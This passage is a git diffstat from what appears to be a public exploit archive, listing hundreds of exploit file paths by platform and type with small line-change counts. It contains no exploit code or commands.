2 +- exploits/multiple/dos/34457.txt | 2 +- exploits/multiple/dos/35369.txt | 2 +- exploits/multiple/dos/36570.txt | 2 +- exploits/multiple/dos/37850.txt | 2 +- exploits/multiple/dos/37852.txt | 2 +- exploits/multiple/dos/37855.txt | 2 +- exploits/multiple/dos/37859.txt | 2 +- exploits/multiple/dos/37863.txt | 2 +- exploits/multiple/dos/37864.txt | 2 +- exploits/multiple/dos/37865.txt | 2 +- exploits/multiple/dos/37871.txt | 2 +- exploits/multiple/dos/37872.txt | 2 +- exploits/multiple/dos/37873.txt | 2 +- exploits/multiple/dos/37874.txt | 2 +- exploits/multiple/dos/37877.txt | 2 +- exploits/multiple/dos/37878.txt | 2 +- exploits/multiple/dos/37882.txt | 2 +- exploits/multiple/dos/38490.txt | 2 +- exploits/multiple/dos/38662.txt | 2 +- exploits/multiple/dos/38930.txt | 2 +- exploits/multiple/dos/38931.txt | 2 +- exploits/multiple/dos/38932.txt | 2 +- exploits/multiple/dos/38933.txt | 2 +- exploits/multiple/dos/38969.txt | 2 +- exploits/multiple/dos/38970.txt | 2 +- exploits/multiple/dos/38992.txt | 2 +- exploits/multiple/dos/38993.txt | 2 +- exploits/multiple/dos/38994.txt | 2 +- exploits/multiple/dos/38995.txt | 2 +- exploits/multiple/dos/38996.txt | 2 +- exploits/multiple/dos/38997.txt | 2 +- exploits/multiple/dos/38998.txt | 2 +- exploits/multiple/dos/38999.txt | 2 +- exploits/multiple/dos/39000.txt | 2 +- exploits/multiple/dos/39001.txt | 2 +- exploits/multiple/dos/39002.txt | 2 +- exploits/multiple/dos/39003.txt | 2 +- exploits/multiple/dos/39004.txt | 2 +- exploits/multiple/dos/39005.txt | 2 +- exploits/multiple/dos/39006.txt | 2 +- exploits/multiple/dos/39039.txt | 2 +- exploits/multiple/dos/39076.txt | 2 +- exploits/multiple/dos/39077.txt | 2 +- exploits/multiple/dos/39162.txt | 2 +- exploits/multiple/dos/39163.txt | 2 +- exploits/multiple/dos/39164.txt | 2 +- exploits/multiple/dos/39165.txt | 2 +- exploits/multiple/dos/39219.txt | 2 +- exploits/multiple/dos/39321.txt | 2 +- exploits/multiple/dos/39322.txt | 2 +- exploits/multiple/dos/39323.txt | 2 +- exploits/multiple/dos/39324.txt | 2 +- exploits/multiple/dos/39325.txt | 2 +- exploits/multiple/dos/39326.txt | 2 +- exploits/multiple/dos/39327.txt | 2 +- exploits/multiple/dos/39358.txt | 2 +- exploits/multiple/dos/39379.txt | 2 +- exploits/multiple/dos/39401.txt | 2 +- exploits/multiple/dos/39426.txt | 2 +- exploits/multiple/dos/39460.txt | 2 +- exploits/multiple/dos/39461.txt | 2 +- exploits/multiple/dos/39462.txt | 2 +- exploits/multiple/dos/39463.txt | 2 +- exploits/multiple/dos/39464.txt | 2 +- exploits/multiple/dos/39465.txt | 2 +- exploits/multiple/dos/39466.txt | 2 +- exploits/multiple/dos/39467.txt | 2 +- exploits/multiple/dos/39476.txt | 2 +- exploits/multiple/dos/39482.txt | 2 +- exploits/multiple/dos/39483.txt | 2 +- exploits/multiple/dos/39484.txt | 2 +- exploits/multiple/dos/39490.txt | 2 +- exploits/multiple/dos/39503.txt | 2 +- exploits/multiple/dos/39529.txt | 2 +- exploits/multiple/dos/39551.txt | 2 +- exploits/multiple/dos/39604.txt | 2 +- exploits/multiple/dos/39633.txt | 2 +- exploits/multiple/dos/39634.txt | 2 +- exploits/multiple/dos/39635.txt | 2 +- exploits/multiple/dos/39644.txt | 2 +- exploits/multiple/dos/39649.txt | 2 +- exploits/multiple/dos/39650.txt | 2 +- exploits/multiple/dos/39652.txt | 2 +- exploits/multiple/dos/39748.txt | 2 +- exploits/multiple/dos/39749.txt | 2 +- exploits/multiple/dos/39750.txt | 2 +- exploits/multiple/dos/39768.txt | 2 +- exploits/multiple/dos/39799.txt | 2 +- exploits/multiple/dos/39812.txt | 2 +- exploits/multiple/dos/39824.txt | 2 +- exploits/multiple/dos/39825.txt | 2 +- exploits/multiple/dos/39826.txt | 2 +- exploits/multiple/dos/39827.txt | 2 +- exploits/multiple/dos/39828.txt | 2 +- exploits/multiple/dos/39829.txt | 2 +- exploits/multiple/dos/39830.txt | 2 +- exploits/multiple/dos/39831.txt | 2 +- exploits/multiple/dos/39834.txt | 2 +- exploits/multiple/dos/39835.txt | 2 +- exploits/multiple/dos/39859.txt | 2 +- exploits/multiple/dos/39860.txt | 2 +- exploits/multiple/dos/39861.txt | 2 +- exploits/multiple/dos/39862.txt | 2 +- exploits/multiple/dos/39863.txt | 2 +- exploits/multiple/dos/39867.py | 2 +- exploits/multiple/dos/39877.txt | 2 +- exploits/multiple/dos/39906.txt | 2 +- exploits/multiple/dos/40031.txt | 2 +- exploits/multiple/dos/40032.txt | 2 +- exploits/multiple/dos/40034.txt | 2 +- exploits/multiple/dos/40035.txt | 2 +- exploits/multiple/dos/40036.txt | 2 +- exploits/multiple/dos/40037.txt | 2 +- exploits/multiple/dos/40087.txt | 2 +- exploits/multiple/dos/40088.txt | 2 +- exploits/multiple/dos/40089.txt | 2 +- exploits/multiple/dos/40090.txt | 2 +- exploits/multiple/dos/40095.txt | 2 +- exploits/multiple/dos/40096.txt | 2 +- exploits/multiple/dos/40097.txt | 2 +- exploits/multiple/dos/40098.txt | 2 +- exploits/multiple/dos/40099.txt | 2 +- exploits/multiple/dos/40100.txt | 2 +- exploits/multiple/dos/40101.txt | 2 +- exploits/multiple/dos/40102.txt | 2 +- exploits/multiple/dos/40103.txt | 2 +- exploits/multiple/dos/40104.txt | 2 +- exploits/multiple/dos/40105.txt | 2 +- exploits/multiple/dos/40194.txt | 2 +- exploits/multiple/dos/40195.txt | 2 +- exploits/multiple/dos/40197.txt | 2 +- exploits/multiple/dos/40198.txt | 2 +- exploits/multiple/dos/40199.txt | 2 +- exploits/multiple/dos/40238.txt | 2 +- exploits/multiple/dos/40307.txt | 2 +- exploits/multiple/dos/40308.txt | 2 +- exploits/multiple/dos/40309.txt | 2 +- exploits/multiple/dos/40310.txt | 2 +- exploits/multiple/dos/40311.txt | 2 +- exploits/multiple/dos/40355.txt | 2 +- exploits/multiple/dos/40356.txt | 2 +- exploits/multiple/dos/40405.txt | 2 +- exploits/multiple/dos/40420.txt | 2 +- exploits/multiple/dos/40421.txt | 2 +- exploits/multiple/dos/40510.txt | 2 +- exploits/multiple/dos/40654.txt | 2 +- exploits/multiple/dos/40955.txt | 2 +- exploits/multiple/dos/41008.txt | 2 +- exploits/multiple/dos/41012.txt | 2 +- exploits/multiple/dos/41163.txt | 2 +- exploits/multiple/dos/41420.txt | 2 +- exploits/multiple/dos/41421.txt | 2 +- exploits/multiple/dos/41422.txt | 2 +- exploits/multiple/dos/41423.txt | 2 +- exploits/multiple/dos/41608.txt | 2 +- exploits/multiple/dos/41609.txt | 2 +- exploits/multiple/dos/41610.txt | 2 +- exploits/multiple/dos/41611.txt | 2 +- exploits/multiple/dos/41612.txt | 2 +- exploits/multiple/dos/41668.txt | 2 +- exploits/multiple/dos/41669.txt | 2 +- exploits/multiple/dos/41905.txt | 2 +- exploits/multiple/dos/42017.txt | 2 +- exploits/multiple/dos/42018.txt | 2 +- exploits/multiple/dos/42019.txt | 2 +- exploits/multiple/dos/42049.txt | 2 +- exploits/multiple/dos/42050.txt | 2 +- exploits/multiple/dos/42051.txt | 2 +- exploits/multiple/dos/42052.txt | 2 +- exploits/multiple/dos/42123.txt | 2 +- exploits/multiple/dos/42124.txt | 2 +- exploits/multiple/dos/42245.txt | 2 +- exploits/multiple/dos/42247.txt | 2 +- exploits/multiple/dos/42248.txt | 2 +- exploits/multiple/dos/42249.txt | 2 +- exploits/multiple/dos/42286.txt | 2 +- exploits/multiple/dos/42666.txt | 3 +- exploits/multiple/dos/42781.txt | 2 +- exploits/multiple/dos/42782.txt | 2 +- exploits/multiple/dos/42783.txt | 2 +- exploits/multiple/dos/42941.py | 2 +- exploits/multiple/dos/42942.py | 2 +- exploits/multiple/dos/42943.py | 2 +- exploits/multiple/dos/42944.py | 2 +- exploits/multiple/dos/42945.py | 2 +- exploits/multiple/dos/42946.py | 2 +- exploits/multiple/dos/42969.rb | 3 +- exploits/multiple/dos/43233.txt | 2 +- exploits/multiple/dos/43320.txt | 2 +- exploits/multiple/dos/43325.txt | 2 +- exploits/multiple/dos/44082.txt | 2 +- exploits/multiple/dos/44083.txt | 2 +- exploits/multiple/dos/44247.txt | 2 +- exploits/multiple/dos/44427.txt | 2 +- exploits/multiple/dos/44491.txt | 2 +- exploits/multiple/dos/44526.txt | 2 +- exploits/multiple/dos/44527.txt | 2 +- exploits/multiple/dos/44528.txt | 2 +- exploits/multiple/dos/44529.txt | 2 +- exploits/multiple/dos/44849.txt | 2 +- exploits/multiple/dos/44862.txt | 2 +- exploits/multiple/dos/44863.txt | 2 +- exploits/multiple/dos/45032.txt | 2 +- exploits/multiple/dos/45059.txt | 2 +- exploits/multiple/dos/45098.txt | 2 +- exploits/multiple/dos/45121.txt | 2 +- exploits/multiple/dos/45122.txt | 2 +- exploits/multiple/dos/45123.txt | 2 +- exploits/multiple/dos/45443.txt | 2 +- exploits/multiple/dos/45444.txt | 2 +- exploits/multiple/dos/45648.txt | 2 +- exploits/multiple/dos/45650.txt | 2 +- exploits/multiple/dos/45950.txt | 2 +- exploits/multiple/dos/45951.txt | 2 +- exploits/multiple/dos/4601.txt | 2 +- exploits/multiple/dos/46096.txt | 2 +- exploits/multiple/dos/46332.txt | 2 +- exploits/multiple/dos/46472.txt | 2 +- exploits/multiple/dos/46473.txt | 2 +- exploits/multiple/dos/46474.txt | 2 +- exploits/multiple/dos/46475.txt | 2 +- exploits/multiple/dos/46476.txt | 2 +- exploits/multiple/dos/46722.txt | 2 +- exploits/multiple/dos/46723.txt | 2 +- exploits/multiple/dos/47001.txt | 2 +- exploits/multiple/dos/47002.txt | 2 +- exploits/multiple/dos/47003.txt | 2 +- exploits/multiple/dos/47004.txt | 2 +- exploits/multiple/dos/47189.txt | 2 +- exploits/multiple/dos/47192.txt | 2 +- exploits/multiple/dos/47193.txt | 2 +- exploits/multiple/dos/47194.txt | 2 +- exploits/multiple/dos/47257.txt | 2 +- exploits/multiple/dos/47450.txt | 2 +- exploits/multiple/dos/47453.txt | 2 +- exploits/multiple/dos/47552.txt | 2 +- exploits/multiple/dos/47608.txt | 2 +- exploits/multiple/dos/47970.txt | 2 +- exploits/multiple/dos/48035.txt | 2 +- exploits/multiple/dos/5229.txt | 2 +- exploits/multiple/dos/6029.txt | 2 +- exploits/multiple/dos/6174.txt | 2 +- exploits/multiple/dos/6237.txt | 2 +- exploits/multiple/dos/6252.txt | 2 +- exploits/multiple/dos/6622.txt | 2 +- exploits/multiple/dos/8285.txt | 2 +- exploits/multiple/dos/8826.txt | 2 +- exploits/multiple/dos/9731.txt | 2 +- exploits/multiple/dos/9987.py | 2 +- exploits/multiple/local/10207.txt | 2 +- exploits/multiple/local/10326.txt | 2 +- exploits/multiple/local/19547.txt | 2 +- exploits/multiple/local/21117.txt | 2 +- exploits/multiple/local/28817.txt | 2 +- exploits/multiple/local/30039.txt | 4 +- exploits/multiple/local/30970.txt | 2 +- exploits/multiple/local/32055.txt | 2 +- exploits/multiple/local/32501.txt | 2 +- exploits/multiple/local/39595.txt | 2 +- exploits/multiple/local/40931.txt | 2 +- exploits/multiple/local/41021.md | 2 +- exploits/multiple/local/41870.txt | 2 +- exploits/multiple/local/41904.txt | 2 +- exploits/multiple/local/42407.txt | 2 +- exploits/multiple/local/43887.txt | 2 +- exploits/multiple/local/48187.txt | 2 +- exploits/multiple/local/48231.md | 2 +- exploits/multiple/remote/13787.txt | 2 +- exploits/multiple/remote/14387.html | 6 +- exploits/multiple/remote/1791.patch | 2 +- exploits/multiple/remote/1799.txt | 4 +- exploits/multiple/remote/18245.py | 5 +- exploits/multiple/remote/18619.txt | 2 +- exploits/multiple/remote/18763.txt | 2 +- exploits/multiple/remote/19093.txt | 2 +- exploits/multiple/remote/19451.txt | 2 +- exploits/multiple/remote/19459.txt | 2 +- exploits/multiple/remote/19749.txt | 2 +- exploits/multiple/remote/20139.txt | 2 +- exploits/multiple/remote/20140.txt | 2 +- exploits/multiple/remote/20181.txt | 2 +- exploits/multiple/remote/20259.txt | 2 +- exploits/multiple/remote/2053.rb | 2 +- exploits/multiple/remote/20685.txt | 2 +- exploits/multiple/remote/20738.txt | 2 +- exploits/multiple/remote/20881.txt | 2 +- exploits/multiple/remote/20889.txt | 2 +- exploits/multiple/remote/20891.txt | 2 +- exploits/multiple/remote/21027.txt | 2 +- exploits/multiple/remote/22029.txt | 8 +- exploits/multiple/remote/22093.py | 2 +- exploits/multiple/remote/22509.txt | 2 +- exploits/multiple/remote/23439.txt | 2 +- exploits/multiple/remote/23707.txt | 2 +- exploits/multiple/remote/24032.txt | 2 +- exploits/multiple/remote/24979.txt | 2 +- exploits/multiple/remote/24980.txt | 2 +- exploits/multiple/remote/24981.txt | 2 +- exploits/multiple/remote/24982.txt | 2 +- exploits/multiple/remote/24983.txt | 2 +- exploits/multiple/remote/24984.txt | 2 +- exploits/multiple/remote/24995.txt | 2 +- exploits/multiple/remote/25011.txt | 2 +- exploits/multiple/remote/25018.txt | 2 +- exploits/multiple/remote/25019.txt | 4 +- exploits/multiple/remote/25028.txt | 2 +- exploits/multiple/remote/25079.txt | 2 +- exploits/multiple/remote/25091.txt | 4 +- exploits/multiple/remote/25132.txt | 2 +- exploits/multiple/remote/25190.txt | 2 +- exploits/multiple/remote/25191.txt | 2 +- exploits/multiple/remote/25205.txt | 2 +- exploits/multiple/remote/25291.txt | 2 +- exploits/multiple/remote/25574.txt | 4 +- exploits/multiple/remote/25691.txt | 4 +- exploits/multiple/remote/25708.txt | 2 +- exploits/multiple/remote/25710.txt | 2 +- exploits/multiple/remote/26210.txt | 2 +- exploits/multiple/remote/28344.txt | 2 +- exploits/multiple/remote/28368.txt | 2 +- exploits/multiple/remote/30288.txt | 2 +- exploits/multiple/remote/30499.txt | 2 +- exploits/multiple/remote/30507.txt | 2 +- exploits/multiple/remote/30508.txt | 2 +- exploits/multiple/remote/30521.txt | 4 +- exploits/multiple/remote/30523.txt | 2 +- exploits/multiple/remote/30643.txt | 2 +- exploits/multiple/remote/30850.txt | 2 +- exploits/multiple/remote/30944.txt | 2 +- exploits/multiple/remote/31106.txt | 2 +- exploits/multiple/remote/31119.txt | 2 +- exploits/multiple/remote/31918.txt | 2 +- exploits/multiple/remote/32363.txt | 2 +- exploits/multiple/remote/32762.pl | 4 +- exploits/multiple/remote/32781.txt | 2 +- exploits/multiple/remote/32945.txt | 2 +- exploits/multiple/remote/33067.txt | 2 +- exploits/multiple/remote/33084.txt | 2 +- exploits/multiple/remote/33786.txt | 2 +- exploits/multiple/remote/33802.txt | 2 +- exploits/multiple/remote/33847.txt | 2 +- exploits/multiple/remote/33907.txt | 2 +- exploits/multiple/remote/34271.txt | 2 +- exploits/multiple/remote/349.txt | 2 +- exploits/multiple/remote/35062.txt | 2 +- exploits/multiple/remote/35352.rb | 13 +- exploits/multiple/remote/35495.txt | 2 +- exploits/multiple/remote/37336.txt | 2 +- exploits/multiple/remote/37851.txt | 2 +- exploits/multiple/remote/39631.txt | 2 +- exploits/multiple/remote/40382.txt | 4 +- exploits/multiple/remote/41740.txt | 2 +- exploits/multiple/remote/42885.rb | 3 +- exploits/multiple/remote/42965.rb | 2 +- exploits/multiple/remote/43665.md | 2 +- exploits/multiple/remote/44584.txt | 2 +- exploits/multiple/remote/45272.txt | 2 +- exploits/multiple/remote/4877.txt | 2 +- exploits/multiple/remote/5790.txt | 2 +- exploits/multiple/remote/6236.txt | 2 +- exploits/multiple/webapps/10209.txt | 2 +- exploits/multiple/webapps/11184.txt | 2 +- exploits/multiple/webapps/11186.txt | 2 +- exploits/multiple/webapps/11187.txt | 2 +- exploits/multiple/webapps/11211.txt | 2 +- exploits/multiple/webapps/12730.txt | 4 +- exploits/multiple/webapps/14001.txt | 2 +- exploits/multiple/webapps/14004.txt | 2 +- exploits/multiple/webapps/17393.txt | 2 +- exploits/multiple/webapps/33493.txt | 4 +- exploits/multiple/webapps/38706.txt | 2 +- exploits/multiple/webapps/42066.txt | 2 +- exploits/multiple/webapps/42610.txt | 4 +- exploits/multiple/webapps/42613.txt | 2 +- exploits/multiple/webapps/43002.py | 2 +- exploits/multiple/webapps/43003.py | 2 +- exploits/multiple/webapps/43004.py | 2 +- exploits/multiple/webapps/43005.py | 2 +- exploits/multiple/webapps/43024.txt | 2 +- exploits/multiple/webapps/43123.txt | 2 +- exploits/multiple/webapps/49705.py | 2 +- exploits/multiple/webapps/50320.sh | 112 ++--- exploits/netbsd_x86/remote/21364.txt | 2 +- exploits/netware/remote/19364.txt | 2 +- exploits/nodejs/webapps/43053.txt | 2 +- exploits/nodejs/webapps/43054.txt | 3 +- exploits/novell/dos/14928.py | 6 +- exploits/novell/dos/31710.txt | 2 +- exploits/osx/dos/17567.txt | 2 +- exploits/osx/dos/27714.txt | 6 +- exploits/osx/dos/27715.txt | 2 +- exploits/osx/dos/27790.txt | 2 +- exploits/osx/dos/28521.txt | 2 +- exploits/osx/dos/29144.txt | 2 +- exploits/osx/dos/29161.txt | 2 +- exploits/osx/dos/29441.txt | 2 +- exploits/osx/dos/29452.txt | 2 +- exploits/osx/dos/29454.txt | 2 +- exploits/osx/dos/29509.txt | 2 +- exploits/osx/dos/29535.txt | 2 +- exploits/osx/dos/29620.txt | 4 +- exploits/osx/dos/38264.txt | 2 +- exploits/osx/dos/39357.txt | 2 +- exploits/osx/dos/39839.txt | 2 +- exploits/osx/dos/44238.c | 2 +- exploits/osx/local/19437.txt | 2 +- exploits/osx/local/19438.txt | 2 +- exploits/osx/local/19439.txt | 2 +- exploits/osx/local/21070.txt | 2 +- exploits/osx/local/21076.txt | 2 +- exploits/osx/local/29190.txt | 2 +- exploits/osx/local/30096.txt | 2 +- exploits/osx/local/3181.rb | 2 +- exploits/osx/local/37825.txt | 2 +- exploits/osx/local/38136.txt | 2 +- exploits/osx/local/38137.txt | 2 +- exploits/osx/local/38138.txt | 2 +- exploits/osx/local/39741.txt | 2 +- exploits/osx/local/3985.txt | 2 +- exploits/osx/local/4013.txt | 2 +- exploits/osx/local/40653.txt | 2 +- exploits/osx/local/44239.md | 2 +- exploits/osx/remote/21596.txt | 2 +- exploits/osx/remote/25598.txt | 4 +- exploits/osx/remote/28643.txt | 2 +- exploits/osx/remote/29448.txt | 2 +- exploits/osx/remote/8753.txt | 2 +- exploits/palm_os/local/20241.txt | 4 +- exploits/palm_os/local/20505.txt | 2 +- exploits/php/dos/14678.txt | 2 +- exploits/php/dos/18296.txt | 2 +- exploits/php/dos/24855.txt | 2 +- exploits/php/dos/33677.txt | 2 +- exploits/php/dos/35358.txt | 2 +- exploits/php/dos/44768.txt | 2 +- exploits/php/remote/32618.txt | 2 +- exploits/php/remote/39742.txt | 2 +- exploits/php/remote/42692.rb | 2 +- exploits/php/webapps/10069.php | 4 +- exploits/php/webapps/10407.txt | 4 +- exploits/php/webapps/10656.txt | 3 +- exploits/php/webapps/11028.txt | 2 +- exploits/php/webapps/11222.txt | 2 +- exploits/php/webapps/11236.txt | 2 +- exploits/php/webapps/11237.txt | 2 +- exploits/php/webapps/11238.txt | 2 +- exploits/php/webapps/11239.txt | 2 +- exploits/php/webapps/11270.txt | 2 +- exploits/php/webapps/11271.txt | 2 +- exploits/php/webapps/11277.txt | 2 +- exploits/php/webapps/11279.txt | 2 +- exploits/php/webapps/11280.txt | 2 +- exploits/php/webapps/11286.txt | 2 +- exploits/php/webapps/11287.txt | 2 +- exploits/php/webapps/11292.txt | 2 +- exploits/php/webapps/11349.txt | 2 +- exploits/php/webapps/11610.txt | 2 +- exploits/php/webapps/11674.txt | 3 +- exploits/php/webapps/11676.txt | 3 +- exploits/php/webapps/11680.txt | 2 +- exploits/php/webapps/11686.txt | 2 +- exploits/php/webapps/11781.html | 2 +- exploits/php/webapps/11829.txt | 3 +- exploits/php/webapps/11841.txt | 2 +- exploits/php/webapps/12009.html | 2 +- exploits/php/webapps/12101.txt | 3 +- exploits/php/webapps/12325.txt | 3 +- exploits/php/webapps/12338.txt | 2 +- exploits/php/webapps/12339.txt | 2 +- exploits/php/webapps/12395.txt | 5 +- exploits/php/webapps/12410.txt | 7 +- exploits/php/webapps/12415.txt | 4 +- exploits/php/webapps/12552.txt | 2 +- exploits/php/webapps/12591.txt | 2 +- exploits/php/webapps/12596.txt | 2 +- exploits/php/webapps/12597.txt | 2 +- exploits/php/webapps/12617.txt | 2 +- exploits/php/webapps/12635.txt | 4 +- exploits/php/webapps/12651.txt | 5 +- exploits/php/webapps/12671.txt | 3 +- exploits/php/webapps/12709.txt | 6 +- exploits/php/webapps/12713.txt | 4 +- exploits/php/webapps/12714.txt | 4 +- exploits/php/webapps/12735.txt | 4 +- exploits/php/webapps/12761.txt | 7 +- exploits/php/webapps/12793.txt | 7 +- exploits/php/webapps/13776.txt | 2 +- exploits/php/webapps/13777.txt | 2 +- exploits/php/webapps/13778.txt | 2 +- exploits/php/webapps/14160.txt | 3 +- exploits/php/webapps/14199.txt | 2 +- exploits/php/webapps/14426.pl | 2 +- exploits/php/webapps/14458.txt | 2 +- exploits/php/webapps/14502.txt | 3 +- exploits/php/webapps/14556.txt | 2 +- exploits/php/webapps/14592.txt | 3 +- exploits/php/webapps/14618.txt | 4 +- exploits/php/webapps/14637.txt | 2 +- exploits/php/webapps/14639.txt | 5 +- exploits/php/webapps/14655.txt | 2 +- exploits/php/webapps/14659.txt | 2 +- exploits/php/webapps/14712.txt | 7 +- exploits/php/webapps/14722.txt | 3 +- exploits/php/webapps/14799.txt | 7 +- exploits/php/webapps/14817.txt | 2 +- exploits/php/webapps/14819.html | 2 +- exploits/php/webapps/14823.txt | 2 +- exploits/php/webapps/14827.py | 5 +- exploits/php/webapps/14834.txt | 2 +- exploits/php/webapps/14837.txt | 3 +- exploits/php/webapps/14839.txt | 3 +- exploits/php/webapps/14841.txt | 3 +- exploits/php/webapps/14849.py | 4 +- exploits/php/webapps/14860.txt | 2 +- exploits/php/webapps/14891.txt | 2 +- exploits/php/webapps/14894.py | 3 +- exploits/php/webapps/14896.txt | 7 +- exploits/php/webapps/14910.txt | 2 +- exploits/php/webapps/14915.txt | 3 +- exploits/php/webapps/14927.txt | 4 +- exploits/php/webapps/14931.php | 3 +- exploits/php/webapps/14960.txt | 2 +- exploits/php/webapps/14985.txt | 3 +- exploits/php/webapps/14989.txt | 2 +- exploits/php/webapps/14996.txt | 2 +- exploits/php/webapps/15090.txt | 2 +- exploits/php/webapps/15121.txt | 3 +- exploits/php/webapps/15154.txt | 2 +- exploits/php/webapps/15173.txt | 2 +- exploits/php/webapps/15223.txt | 2 +- exploits/php/webapps/15251.txt | 2 +- exploits/php/webapps/15338.txt | 2 +- exploits/php/webapps/15389.php | 4 +- exploits/php/webapps/15430.txt | 2 +- exploits/php/webapps/15452.txt | 2 +- exploits/php/webapps/15453.txt | 4 +- exploits/php/webapps/15454.txt | 4 +- exploits/php/webapps/15524.txt | 4 +- exploits/php/webapps/15568.py | 3 +- exploits/php/webapps/15574.txt | 2 +- exploits/php/webapps/15585.txt | 5 +- exploits/php/webapps/15593.html | 2 +- exploits/php/webapps/15621.txt | 5 +- exploits/php/webapps/15638.txt | 3 +- exploits/php/webapps/15720.txt | 5 +- exploits/php/webapps/15813.txt | 4 +- exploits/php/webapps/15814.txt | 6 +- exploits/php/webapps/15815.txt | 6 +- exploits/php/webapps/15822.html | 2 +- exploits/php/webapps/15887.txt | 2 +- exploits/php/webapps/15889.txt | 2 +- exploits/php/webapps/15891.txt | 6 +- exploits/php/webapps/15892.html | 6 +- exploits/php/webapps/15999.txt | 2 +- exploits/php/webapps/16018.txt | 2 +- exploits/php/webapps/16019.txt | 2 +- exploits/php/webapps/16020.txt | 2 +- exploits/php/webapps/16034.txt | 2 +- exploits/php/webapps/16037.html | 6 +- exploits/php/webapps/16047.txt | 6 +- exploits/php/webapps/16062.txt | 3 +- exploits/php/webapps/16069.txt | 2 +- exploits/php/webapps/16087.txt | 3 +- exploits/php/webapps/16122.txt | 4 +- exploits/php/webapps/16167.txt | 5 +- exploits/php/webapps/16256.txt | 3 +- exploits/php/webapps/16257.txt | 3 +- exploits/php/webapps/16934.pl | 3 +- exploits/php/webapps/16937.pl | 4 +- exploits/php/webapps/17007.txt | 3 +- exploits/php/webapps/17018.txt | 3 +- exploits/php/webapps/17091.html | 6 +- exploits/php/webapps/17092.html | 6 +- exploits/php/webapps/17093.html | 6 +- exploits/php/webapps/17094.html | 6 +- exploits/php/webapps/17095.html | 6 +- exploits/php/webapps/17096.html | 6 +- exploits/php/webapps/17146.txt | 2 +- exploits/php/webapps/17173.txt | 2 +- exploits/php/webapps/17180.txt | 4 +- exploits/php/webapps/17292.txt | 2 +- exploits/php/webapps/17309.txt | 2 +- exploits/php/webapps/17346.php | 2 +- exploits/php/webapps/17737.txt | 2 +- exploits/php/webapps/17943.txt | 3 +- exploits/php/webapps/17980.txt | 2 +- exploits/php/webapps/18036.txt | 2 +- exploits/php/webapps/18063.txt | 2 +- exploits/php/webapps/18090.txt | 7 +- exploits/php/webapps/18236.txt | 13 +- exploits/php/webapps/18330.txt | 2 +- exploits/php/webapps/18350.txt | 3 +- exploits/php/webapps/18527.txt | 2 +- exploits/php/webapps/18536.txt | 2 +- exploits/php/webapps/18575.txt | 2 +- exploits/php/webapps/18598.txt | 6 +- exploits/php/webapps/18652.txt | 2 +- exploits/php/webapps/18694.txt | 2 +- exploits/php/webapps/18965.html | 3 +- exploits/php/webapps/19431.txt | 7 +- exploits/php/webapps/2032.pl | 2 +- exploits/php/webapps/2035.php | 2 +- exploits/php/webapps/20416.txt | 3 +- exploits/php/webapps/2050.php | 2 +- exploits/php/webapps/2068.php | 2 +- exploits/php/webapps/2088.php | 2 +- exploits/php/webapps/2095.txt | 2 +- exploits/php/webapps/2096.txt | 2 +- exploits/php/webapps/2098.txt | 2 +- exploits/php/webapps/20983.pl | 3 +- exploits/php/webapps/2100.txt | 2 +- exploits/php/webapps/2102.txt | 2 +- exploits/php/webapps/2114.html | 2 +- exploits/php/webapps/2116.txt | 2 +- exploits/php/webapps/2117.php | 2 +- exploits/php/webapps/2118.php | 2 +- exploits/php/webapps/21220.txt | 2 +- exploits/php/webapps/2123.txt | 2 +- exploits/php/webapps/21250.txt | 2 +- exploits/php/webapps/2128.txt | 2 +- exploits/php/webapps/21301.txt | 2 +- exploits/php/webapps/21715.txt | 3 +- exploits/php/webapps/22004.txt | 2 +- exploits/php/webapps/22089.txt | 2 +- exploits/php/webapps/22090.txt | 2 +- exploits/php/webapps/22097.txt | 3 +- exploits/php/webapps/22152.txt | 3 +- exploits/php/webapps/22403.txt | 3 +- exploits/php/webapps/22463.txt | 3 +- exploits/php/webapps/22473.txt | 2 +- exploits/php/webapps/22710.txt | 2 +- exploits/php/webapps/22712.txt | 2 +- exploits/php/webapps/23028.txt | 2 +- exploits/php/webapps/23029.txt | 2 +- exploits/php/webapps/23106.txt | 4 +- exploits/php/webapps/23249.txt | 2 +- exploits/php/webapps/23286.txt | 3 +- exploits/php/webapps/24480.txt | 2 +- exploits/php/webapps/24514.txt | 2 +- exploits/php/webapps/24851.txt | 2 +- exploits/php/webapps/24879.txt | 4 +- exploits/php/webapps/25168.c | 3 +- exploits/php/webapps/25249.txt | 2 +- exploits/php/webapps/25410.txt | 3 +- exploits/php/webapps/25726.txt | 2 +- exploits/php/webapps/26111.txt | 2 +- exploits/php/webapps/26213.txt | 2 +- exploits/php/webapps/26425.pl | 2 +- exploits/php/webapps/27450.txt | 2 +- exploits/php/webapps/28139.txt | 2 +- exploits/php/webapps/28586.txt | 5 +- exploits/php/webapps/28844.txt | 2 +- exploits/php/webapps/28896.txt | 2 +- exploits/php/webapps/29451.txt | 5 +- exploits/php/webapps/29998.txt | 2 +- exploits/php/webapps/30105.txt | 3 +- exploits/php/webapps/30877.txt | 2 +- exploits/php/webapps/30926.txt | 2 +- exploits/php/webapps/30946.txt | 3 +- exploits/php/webapps/31678.txt | 2 +- exploits/php/webapps/32868.txt | 2 +- exploits/php/webapps/33030.txt | 2 +- exploits/php/webapps/33072.txt | 2 +- exploits/php/webapps/33195.txt | 2 +- exploits/php/webapps/33487.txt | 2 +- exploits/php/webapps/33987.txt | 2 +- exploits/php/webapps/34338.html | 2 +- exploits/php/webapps/34381.txt | 2 +- exploits/php/webapps/34684.pl | 2 +- exploits/php/webapps/34708.pl | 3 +- exploits/php/webapps/34818.html | 3 +- exploits/php/webapps/35460.txt | 3 +- exploits/php/webapps/35566.txt | 2 +- exploits/php/webapps/35996.txt | 2 +- exploits/php/webapps/36386.txt | 4 +- exploits/php/webapps/36561.txt | 2 +- exploits/php/webapps/37389.txt | 3 +- exploits/php/webapps/37629.txt | 2 +- exploits/php/webapps/37959.txt | 2 +- exploits/php/webapps/38477.txt | 2 +- exploits/php/webapps/38991.pl | 2 +- exploits/php/webapps/39167.txt | 2 +- exploits/php/webapps/39272.txt | 2 +- exploits/php/webapps/40209.py | 2 +- exploits/php/webapps/4059.txt | 2 +- exploits/php/webapps/40637.txt | 2 +- exploits/php/webapps/40755.html | 2 +- exploits/php/webapps/41005.txt | 2 +- exploits/php/webapps/41201.txt | 3 +- exploits/php/webapps/41580.pl | 6 +- exploits/php/webapps/4195.txt | 6 +- exploits/php/webapps/42003.txt | 2 +- exploits/php/webapps/4201.txt | 2 +- exploits/php/webapps/42172.txt | 3 +- exploits/php/webapps/42173.txt | 5 +- exploits/php/webapps/42572.txt | 2 +- exploits/php/webapps/42584.txt | 2 +- exploits/php/webapps/42592.html | 7 +- exploits/php/webapps/42598.txt | 4 